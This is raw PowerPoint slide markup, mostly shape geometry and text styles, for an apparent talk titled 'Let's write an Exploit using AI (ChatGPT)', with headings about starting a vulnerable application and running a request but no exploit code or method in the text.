                <a:gd name="connsiteY3" fmla="*/ 157765 h 157765"/>
                <a:gd name="connsiteX4" fmla="*/ 91148 w 91147"/>
                <a:gd name="connsiteY4" fmla="*/ 157765 h 157765"/>
                <a:gd name="connsiteX5" fmla="*/ 91148 w 91147"/>
                <a:gd name="connsiteY5" fmla="*/ 126273 h 157765"/>
                <a:gd name="connsiteX6" fmla="*/ 33380 w 91147"/>
                <a:gd name="connsiteY6" fmla="*/ 126273 h 157765"/>
                <a:gd name="connsiteX7" fmla="*/ 33380 w 91147"/>
                <a:gd name="connsiteY7" fmla="*/ 94023 h 157765"/>
                <a:gd name="connsiteX8" fmla="*/ 91148 w 91147"/>
                <a:gd name="connsiteY8" fmla="*/ 94023 h 157765"/>
                <a:gd name="connsiteX9" fmla="*/ 91148 w 91147"/>
                <a:gd name="connsiteY9" fmla="*/ 62379 h 157765"/>
                <a:gd name="connsiteX10" fmla="*/ 33380 w 91147"/>
                <a:gd name="connsiteY10" fmla="*/ 62379 h 157765"/>
                <a:gd name="connsiteX11" fmla="*/ 33380 w 91147"/>
                <a:gd name="connsiteY11" fmla="*/ 31493 h 157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47" h="157765">
                  <a:moveTo>
                    <a:pt x="91148" y="31493"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="91148" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="157765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91148" y="157765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91148" y="126273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33380" y="126273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33380" y="94023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91148" y="94023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91148" y="62379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33380" y="62379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33380" y="31493"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="1512" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="0" i="0">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="Freeform 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F67C5208-1E93-E241-9943-9A09B557E6B0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9551039" y="6539461"/>
              <a:ext cx="159431" cy="163216"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 81850 w 159431"/>
                <a:gd name="connsiteY0" fmla="*/ 31493 h 163216"/>
                <a:gd name="connsiteX1" fmla="*/ 118278 w 159431"/>
                <a:gd name="connsiteY1" fmla="*/ 49510 h 163216"/>
                <a:gd name="connsiteX2" fmla="*/ 120412 w 159431"/>
                <a:gd name="connsiteY2" fmla="*/ 51932 h 163216"/>
                <a:gd name="connsiteX3" fmla="*/ 123156 w 159431"/>
                <a:gd name="connsiteY3" fmla="*/ 51932 h 163216"/>
                <a:gd name="connsiteX4" fmla="*/ 159432 w 159431"/>
                <a:gd name="connsiteY4" fmla="*/ 51932 h 163216"/>
                <a:gd name="connsiteX5" fmla="*/ 153945 w 159431"/>
                <a:gd name="connsiteY5" fmla="*/ 42545 h 163216"/>
                <a:gd name="connsiteX6" fmla="*/ 129862 w 159431"/>
                <a:gd name="connsiteY6" fmla="*/ 15292 h 163216"/>
                <a:gd name="connsiteX7" fmla="*/ 81545 w 159431"/>
                <a:gd name="connsiteY7" fmla="*/ 0 h 163216"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 159431"/>
                <a:gd name="connsiteY8" fmla="*/ 81002 h 163216"/>
                <a:gd name="connsiteX9" fmla="*/ 81393 w 159431"/>
                <a:gd name="connsiteY9" fmla="*/ 163216 h 163216"/>
                <a:gd name="connsiteX10" fmla="*/ 153335 w 159431"/>
                <a:gd name="connsiteY10" fmla="*/ 121277 h 163216"/>
                <a:gd name="connsiteX11" fmla="*/ 158517 w 159431"/>
                <a:gd name="connsiteY11" fmla="*/ 112344 h 163216"/>
                <a:gd name="connsiteX12" fmla="*/ 119041 w 159431"/>
                <a:gd name="connsiteY12" fmla="*/ 112344 h 163216"/>
                <a:gd name="connsiteX13" fmla="*/ 117211 w 159431"/>
                <a:gd name="connsiteY13" fmla="*/ 114463 h 163216"/>
                <a:gd name="connsiteX14" fmla="*/ 81697 w 159431"/>
                <a:gd name="connsiteY14" fmla="*/ 131724 h 163216"/>
                <a:gd name="connsiteX15" fmla="*/ 33533 w 159431"/>
                <a:gd name="connsiteY15" fmla="*/ 81154 h 163216"/>
                <a:gd name="connsiteX16" fmla="*/ 81850 w 159431"/>
                <a:gd name="connsiteY16" fmla="*/ 31493 h 16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431" h="163216">
                  <a:moveTo>
                    <a:pt x="81850" y="31493"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="102274" y="31493"/>
                    <a:pt x="113858" y="44665"/>
                    <a:pt x="118278" y="49510"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="120412" y="51932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123156" y="51932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159432" y="51932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153945" y="42545"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="149982" y="35732"/>
                    <a:pt x="143885" y="25285"/>
                    <a:pt x="129862" y="15292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110657" y="1514"/>
                    <a:pt x="89623" y="0"/>
                    <a:pt x="81545" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36581" y="0"/>
                    <a:pt x="0" y="36338"/>
                    <a:pt x="0" y="81002"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="126424"/>
                    <a:pt x="36581" y="163216"/>
                    <a:pt x="81393" y="163216"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111572" y="163216"/>
                    <a:pt x="138398" y="147621"/>
                    <a:pt x="153335" y="121277"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="158517" y="112344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119041" y="112344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117211" y="114463"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="107914" y="125364"/>
                    <a:pt x="94958" y="131724"/>
                    <a:pt x="81697" y="131724"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55634" y="131724"/>
                    <a:pt x="33533" y="108558"/>
                    <a:pt x="33533" y="81154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33228" y="53901"/>
                    <a:pt x="55024" y="31493"/>
                    <a:pt x="81850" y="31493"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="1512" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="0" i="0">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="Freeform 66">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12AC3DC5-FD1C-A44A-88B5-6416653383A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9944132" y="6542337"/>
              <a:ext cx="89775" cy="157916"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 8688 w 89775"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 157916"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 89775"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 157916"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 89775"/>
                <a:gd name="connsiteY2" fmla="*/ 31493 h 157916"/>
                <a:gd name="connsiteX3" fmla="*/ 8536 w 89775"/>
                <a:gd name="connsiteY3" fmla="*/ 31493 h 157916"/>
                <a:gd name="connsiteX4" fmla="*/ 56243 w 89775"/>
                <a:gd name="connsiteY4" fmla="*/ 79337 h 157916"/>
                <a:gd name="connsiteX5" fmla="*/ 8078 w 89775"/>
                <a:gd name="connsiteY5" fmla="*/ 126424 h 157916"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 89775"/>
                <a:gd name="connsiteY6" fmla="*/ 126424 h 157916"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 89775"/>
                <a:gd name="connsiteY7" fmla="*/ 157917 h 157916"/>
                <a:gd name="connsiteX8" fmla="*/ 7926 w 89775"/>
                <a:gd name="connsiteY8" fmla="*/ 157917 h 157916"/>
                <a:gd name="connsiteX9" fmla="*/ 69504 w 89775"/>
                <a:gd name="connsiteY9" fmla="*/ 135055 h 157916"/>
                <a:gd name="connsiteX10" fmla="*/ 89776 w 89775"/>
                <a:gd name="connsiteY10" fmla="*/ 79337 h 157916"/>
                <a:gd name="connsiteX11" fmla="*/ 73619 w 89775"/>
                <a:gd name="connsiteY11" fmla="*/ 29373 h 157916"/>
                <a:gd name="connsiteX12" fmla="*/ 8688 w 89775"/>
                <a:gd name="connsiteY12" fmla="*/ 0 h 15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775" h="157916">
                  <a:moveTo>
                    <a:pt x="8688" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="31493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8536" y="31493"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="46183" y="31493"/>
                    <a:pt x="56243" y="61622"/>
                    <a:pt x="56243" y="79337"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56243" y="121731"/>
                    <a:pt x="22558" y="126424"/>
                    <a:pt x="8078" y="126424"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="126424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="157917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7926" y="157917"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="34142" y="157917"/>
                    <a:pt x="53652" y="150649"/>
                    <a:pt x="69504" y="135055"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81545" y="123245"/>
                    <a:pt x="89776" y="100837"/>
                    <a:pt x="89776" y="79337"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89776" y="62077"/>
                    <a:pt x="83679" y="43454"/>
                    <a:pt x="73619" y="29373"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59292" y="9841"/>
                    <a:pt x="37343" y="0"/>
                    <a:pt x="8688" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="1512" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="0" i="0">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2471948010"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:hf hdr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="4000" b="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="1000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="bg2"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buNone/>
        <a:tabLst/>
        <a:defRPr sz="2000" b="0" i="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="463550" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="bg2"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr sz="1800" b="0" i="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="630238" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="bg2"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr sz="1600" b="0" i="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="808038" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="bg2"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr sz="1400" b="0" i="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="857250" indent="-166688" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="bg2"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr sz="1400" b="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" panose="020B070302020209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22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51DE3ED1-F9AF-0F87-F252-84DB1ECEFFC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="436975" y="1991773"/>
            <a:ext cx="7575883" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marR="0" algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:tabLst>
                <a:tab pos="914400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Lato Light" panose="020F0302020204030203" pitchFamily="34" charset="77"/>
                <a:ea typeface="Trebuchet MS" panose="020B0703020202090204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Let’s write an Exploit using AI (ChatGPT)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9F008BE-B8C7-C7DE-351F-04B7EC1C8EDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415095" y="4279108"/>
            <a:ext cx="5936009" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1D2D3"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
              </a:rPr>
              <a:t>Julian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1D2D3"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
              </a:rPr>
              <a:t>Totzek-Hallhuber</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1D2D3"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1D2D3"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
              </a:rPr>
              <a:t>Manager Solution Architects EMEA/APAC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              <a:ea typeface="Lato"/>
              <a:cs typeface="Lato"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3739121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A7C245E-D398-0F11-905D-FB3986609DDD}"/>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F8D1A677-7EA7-2BE6-105A-1B0B0F9460F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FBDCA66-C2B9-A5CB-2F76-52F652FB3AF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>Testing/Running it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A20D276-ECE6-AF02-E0C3-DFC0AF83B6E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="368509" y="1537161"/>
            <a:ext cx="7711461" cy="1522770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74DD203B-3691-CB3D-10E5-7871B56F461C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368510" y="1198607"/>
            <a:ext cx="3296095" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Starting the vulnerable application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87EF14C6-4C3B-105E-A118-B41072B36F45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368509" y="3347767"/>
            <a:ext cx="2026517" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Running the request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B705ABFE-E746-8D55-BF75-5D1ED5C6E0A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368509" y="4537390"/>
            <a:ext cx="3655168" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
